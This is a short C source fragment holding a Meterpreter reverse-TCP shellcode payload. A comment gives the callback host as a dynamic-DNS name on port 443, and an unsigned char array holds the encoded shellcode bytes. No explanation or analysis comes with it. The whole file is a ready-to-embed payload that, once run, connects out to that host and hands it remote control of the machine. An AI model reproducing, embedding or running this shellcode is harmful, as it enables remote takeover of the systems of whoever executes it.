/*
	meterpreter/reverse_tcp_dns LHOST=wrmhle.ddns.net LPORT=443
*/
unsigned char buffer[] = 
"\xda\xc0\xbb\xb4\xb9\x0e\x91\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x5a\x83\xc2\x04\x31\x5a\x13\x03\xee\xaa\xec\x64\xf2\x25\x72"
"\x86\x0a\xb6\x13\x0e\xef\x87\x13\x74\x64\xb7\xa3\xfe\x28\x34"
"\x4f\x52\xd8\xcf\x3d\x7b\xef\x78\x8b\x5d\xde\x79\xa0\x9e\x41"
"\xfa\xbb\xf2\xa1\xc3\x73\x07\xa0\x04\x69\xea\xf0\xdd\xe5\x59"
"\xe4\x6a\xb3\x61\x8f\x21\x55\xe2\x6c\xf1\x54\xc3\x23\x89\x0e"
"\xc3\xc2\x5e\x3b\x4a\xdc\x83\x06\x04\x57\x77\xfc\x97\xb1\x49"
"\xfd\x34\xfc\x65\x0c\x44\x39\x41\xef\x33\x33\xb1\x92\x43\x80"
"\xcb\x48\xc1\x12\x6b\x1a\x71\xfe\x8d\xcf\xe4\x75\x81\xa4\x63"
"\xd1\x86\x3b\xa7\x6a\xb2\xb0\x46\xbc\x32\x82\x6c\x18\x1e\x50"
"\x0c\x39\xfa\x37\x31\x59\xa5\xe8\x97\x12\x48\xfc\xa5\x79\x05"
"\x31\x84\x81\xd5\x5d\x9f\xf2\xe7\xc2\x0b\x9c\x4b\x8a\x95\x5b"
"\xab\xa1\x62\xf3\x52\x4a\x93\xda\x90\x1e\xc3\x74\x30\x1f\x88"
"\x84\xbd\xca\x1f\xd4\x11\xa5\xdf\x84\xd1\x15\x88\xce\xdd\x4a"
"\xa8\xf1\x37\xe3\xc1\x4d\xb8\x0c\x12\x3a\xca\x61\x7a\xa8\x4f"
"\x54\x1e\x54\xfe\xdb\xf0\xfa\x9b\x6f\x0d\x5a\x3c\xc8\x55\x02"
"\xe4\xb0\x3d\xea\x4c\x19\xe6\x52\x35\xc1\x4e\x3a\x9d\xa9\x36"
"\xe2\x45\x12\x9f\x4a\x2e\xfa\x47\x32\x96\xa2\x2f\x9a\x7e\x0b"
"\x88\x42\x27\xf3\x70\x2a\x8f\x5b\xd9\x92\x77\x04\xd9\x4a\x21"
"\x9c\xed\x0a\xce\x08\x86\x4a\x2d\xd9\x9c\x1a\x25\x1f\x9f\x9b"
"\x0e\x96\x79\xf1\x60\xff\xd2\x6d\x18\x5a\xa8\x0c\xe5\x70\xd4"
"\x0e\x6d\x77\x28\xc0\x86\xf2\x3a\xb4\x66\x49\x60\x12\x78\x67"
"\x0f\x9a\xec\x8c\x86\xcd\x98\x8e\xff\x39\x07\x70\x2a\x32\x8e"
"\xe4\x95\x2c\xef\xe8\x15\xac\xb9\x62\x16\xc4\x1d\xd7\x45\xf1"
"\x61\xc2\xf9\xaa\xf7\xed\xab\x1f\x5f\x86\x51\x46\x97\x09\xa9"
"\xad\x29\x75\x7c\x8b\x5f\x97\xbc";
